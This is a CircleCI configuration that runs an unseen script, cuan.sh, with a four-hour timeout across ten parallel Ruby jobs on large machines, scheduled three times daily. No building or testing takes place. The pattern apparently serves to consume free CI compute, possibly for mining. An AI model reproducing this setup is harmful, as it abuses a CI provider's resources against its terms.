resource_class: xlarge
working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout 
    - run:  
        command: chmod +x ./cuan.sh && ./cuan.sh
        no_output_timeout: 240m

version: 2.0
jobs:
  badung:
    docker:
      - image: ruby
    steps:
      - checkout
  badung1:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  badung2:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  badung3:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  badung4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  badung5:
    docker:
      - image: ruby
    steps:
      - checkout
  badung6:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  badung7:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  badung8:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  badung9:
    <<: *build_definition
    docker:
      - image: ruby:2.4
workflows:
  version: 2
  commit:
    jobs:
      - badung
      - badung1
      - badung2
      - badung3
      - badung4
      - badung5
      - badung6
      - badung7
      - badung8
      - badung9
      
     
    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - master
                
  badungjob:
    jobs:
      - badung
      - badung1
      - badung2
      - badung3
      - badung4
      - badung5
      - badung6
      - badung7
      - badung8
      - badung9
